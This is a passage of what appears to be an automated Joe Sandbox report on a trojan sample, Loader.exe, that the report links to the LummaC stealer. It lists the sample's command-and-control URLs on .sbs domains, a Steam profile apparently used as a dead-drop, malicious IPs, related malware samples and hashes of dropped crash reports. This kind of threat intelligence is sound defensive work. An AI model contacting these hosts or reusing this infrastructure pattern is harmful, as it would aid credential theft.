https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://resinedyw.sbs/	Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://resinedyw.sbs/api%U	Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://resinedyw.sbs/api(	Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/workshop/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://mathcucom.sbs/api4	Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/legal/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/apis	Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/	Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/account/cookiepreferences/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/mobile	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://resinedyw.sbs:443/apii	Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/badges	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.33.249	enlargkiw.sbs	United States	13335	CLOUDFLARENETUS	true
172.67.173.224	ehticsprocw.sbs	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	drawwyobstacw.sbs	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
172.67.205.156	resinedyw.sbs	United States	13335	CLOUDFLARENETUS	true
172.67.140.193	vennurviot.sbs	United States	13335	CLOUDFLARENETUS	true
104.21.79.35	condifendteu.sbs	United States	13335	CLOUDFLARENETUS	true
104.21.8.37	widdensmoywi.sbs	United States	13335	CLOUDFLARENETUS	true
172.67.206.204	sergei-esenin.com	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532242
Start date and time:	2024-10-12 22:35:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Loader.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/13@11/9
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 83% Number of executed functions: 20 Number of non-executed functions: 190
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.42.65.92
Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Loader.exe, PID 6972 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:36:02	API Interceptor	4x Sleep call for process: Loader.exe modified
16:36:04	API Interceptor	3x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.33.249	Solara.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	CachemanTray_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse
	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Get hash	malicious	LummaC, Vidar	Browse
172.67.173.224	ASmartCore_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse
188.114.96.3	DRAFT DOC2406656.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sirr/five/fre.php
	lv961v43L3.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
	10092024150836 09.10.2024.vbe	Get hash	malicious	FormBook	Browse	www.airgame.store/ojib/
	Hesap-hareketleriniz.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/59fb/
	octux.exe.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	bX8NyyjOFz.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2uvi/
	lWfpGAu3ao.exe	Get hash	malicious	FormBook	Browse	www.serverplay.live/71nl/
	sa7Bw41TUq.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/0r21/
	E_receipt.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/VO2TX
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/fOmsJ2bL/download
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
drawwyobstacw.sbs	Wintohdd.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	ASmartCore_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Solara.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	CachemanTray_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	vsYkceYJOX.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
vennurviot.sbs	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	ASmartCore_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	104.21.46.170
	Solara.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.46.170
	CachemanTray_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	vsYkceYJOX.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar	Browse	104.21.46.170
	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.140.193
steamcommunity.com	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
mathcucom.sbs	Wintohdd.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	ASmartCore_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Solara.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	CachemanTray_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	vsYkceYJOX.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
condifendteu.sbs	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	ASmartCore_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Solara.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	CachemanTray_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	vsYkceYJOX.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar	Browse	172.67.141.136
	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.79.35

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	AeYgxx6XFk.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	na.elf	Get hash	malicious	Mirai	Browse	8.6.157.70
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	http://coin-have.c0m	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	AeYgxx6XFk.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	na.elf	Get hash	malicious	Mirai	Browse	8.6.157.70
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	http://coin-have.c0m	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	AeYgxx6XFk.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	na.elf	Get hash	malicious	Mirai	Browse	8.6.157.70
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	http://coin-have.c0m	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	AeYgxx6XFk.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	na.elf	Get hash	malicious	Mirai	Browse	8.6.157.70
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	http://coin-have.c0m	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
AKAMAI-ASUS	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	na.elf	Get hash	malicious	Mirai	Browse	23.44.156.65
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	na.elf	Get hash	malicious	Mirai	Browse	23.64.208.64
	na.elf	Get hash	malicious	Mirai	Browse	23.42.205.249
	na.elf	Get hash	malicious	Mirai	Browse	23.42.118.13

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.249 172.67.173.224 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 104.21.8.37 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.249 172.67.173.224 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 104.21.8.37 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.249 172.67.173.224 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 104.21.8.37 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.249 172.67.173.224 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 104.21.8.37 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.249 172.67.173.224 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 104.21.8.37 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.249 172.67.173.224 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 104.21.8.37 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.249 172.67.173.224 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 104.21.8.37 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.249 172.67.173.224 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 104.21.8.37 172.67.206.204
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	104.21.33.249 172.67.173.224 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 104.21.8.37 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.249 172.67.173.224 188.114.96.3 104.102.49.254 172.67.205.156 172.67.140.193 104.21.79.35 104.21.8.37 172.67.206.204

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_77471525334c8b14c8bdc1925498d9a2270c332_00a9e466_1e40f4b4-72b8-488c-93ed-b9672588f9e0\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0409599350511907
Encrypted:	false
SSDEEP:	96:+OFTG2KsUhY1yDfAQXIDcQzc6rcEqcw3M3+HbHggggS/Yy2rLhOyRxDfQLPF5rsn:xBKV0Nvw4cjGm5ySOzuiF2Z24IO8LQ
MD5:	B37DF4681194381A9C7FBD334047FAD6
SHA1:	7961062EB683FF64577791F649FCC9C5366EDFC0
SHA-256:	331DE58736CA960B79E1C3A4B897F9E5DA7161D00FBF35884851DD53B62EFC1B
SHA-512:	5EA52A9FBAD593E9D91257BDCBD154E1BFCEF35122B3F5F369D25A1779F34F49BC4FBA32AA3AADFABB8EE1E022E915FC13051F8AC7BCE206D0BE331E018FD87B
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.3.8.9.7.2.7.1.8.5.1.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.3.8.9.7.3.7.8.1.0.1.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.4.0.f.4.b.4.-.7.2.b.8.-.4.8.8.c.-.9.3.e.d.-.b.9.6.7.2.5.8.8.f.9.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.9.2.c.c.9.2.-.1.4.9.2.-.4.f.3.4.-.a.5.2.5.-.5.2.6.2.7.3.f.a.c.8.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.o.a.d.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.5.0.-.0.0.0.1.-.0.0.1.5.-.8.7.9.0.-.8.e.5.9.e.6.1.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.2.2.0.c.a.c.8.c.b.c.f.c.a.5.d.8.8.6.9.f.1.4.9.f.7.b.7.9.e.b.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.0.8.7.d.7.b.1.8.d.9.d.d.3.7.c.b.6.8.f.8.1.1.f.7.2.d.e.6.c.0.d.b.b.b.f.d.3.1.!.L.o.a.d.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_b815356964293c838cede0c4a3c92463e86ea911_00a9e466_32e7d15c-7355-41ce-b09f-98a33d50d914\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	modified
Size (bytes):	65536
Entropy (8bit):	1.0461998141723694
Encrypted:	false
SSDEEP:	192:rQU/Piq05RL5jGm5ySOzuiF2Z24IO8OQ:EU/ax5RL5jPfOzuiF2Y4IO8O
MD5:	299F4C245BC20BC4AA5561BE262FD189
SHA1:	6BCA8F5579E3B10BCB1CAFD6A955CD7FFFABC25A
SHA-256:	ACCCE4E532E589AFDCE8DF6A7942541494D9EF4716796748287B19423F2F0B9E
SHA-512:	F90870737D5159BD94AF981F587A81401FFB099D2351D4A210967C77ABDC3B31CEBE624E27B78376C55B609C55A379439A538BC7EE703034C346AED6847DA25E
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.3.8.9.7.4.9.2.4.7.6.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.3.8.9.7.5.9.8.7.2.6.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.e.7.d.1.5.c.-.7.3.5.5.-.4.1.c.e.-.b.0.9.f.-.9.8.a.3.3.d.5.0.d.9.1.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.9.0.5.9.2.c.-.9.8.3.0.-.4.1.0.a.-.8.e.2.3.-.0.c.d.b.f.7.b.f.0.9.9.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.o.a.d.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.5.0.-.0.0.0.1.-.0.0.1.5.-.8.7.9.0.-.8.e.5.9.e.6.1.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.2.2.0.c.a.c.8.c.b.c.f.c.a.5.d.8.8.6.9.f.1.4.9.f.7.b.7.9.e.b.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.0.8.7.d.7.b.1.8.d.9.d.d.3.7.c.b.6.8.f.8.1.1.f.7.2.d.e.6.c.0.d.b.b.b.f.d.3.1.!.L.o.a.d.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0./.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_cb31ed643f3fc60e893b10d5662d7ffd15dc47_d9249e67_e58a3cdf-0c76-4fca-bfea-a73be3584e5f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6420461588339392
Encrypted:	false
SSDEEP:	96:HuF/Duo2aRsUh/e7ifNQXIDcQvc6QcEVcw3cE/3+HbHg/5hZAX/d5FMT2SlPkpXR:O9Uk80BU/QjhzuiF2Z24IO8L
MD5:	E8A463BF48833983E74E850EA32B40B0
SHA1:	C761E13B67B80014000582C4EF2B3B4164E6F77A
SHA-256:	19F14DEA684C722E05B076B8DFBECD7261454C849D169F3F737E9D210AC23C2D
SHA-512:	6AC14DE3D4051DCA47E1B78F0FD5ADBE8B29458F3F3926C323882193D1B45437CE53E042163230C7EA0CA3D9C9C7A29471731DE4FA0F0B03BF67BF0DD2D120F7
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.3.8.9.6.1.5.7.8.9.6.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.3.8.9.6.2.0.0.0.8.3.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.8.a.3.c.d.f.-.0.c.7.6.-.4.f.c.a.-.b.f.e.a.-.a.7.3.b.e.3.5.8.4.e.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.7.9.8.3.e.d.-.9.1.5.0.-.4.4.d.6.-.a.3.2.0.-.5.0.e.d.4.e.f.1.d.f.3.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.o.a.d.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.8.-.0.0.0.1.-.0.0.1.5.-.d.8.3.d.-.b.7.5.8.e.6.1.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.2.2.0.c.a.c.8.c.b.c.f.c.a.5.d.8.8.6.9.f.1.4.9.f.7.b.7.9.e.b.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.0.8.7.d.7.b.1.8.d.9.d.d.3.7.c.b.6.8.f.8.1.1.f.7.2.d.e.6.c.0.d.b.b.b.f.d.3.1.!.L.o.a.d.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e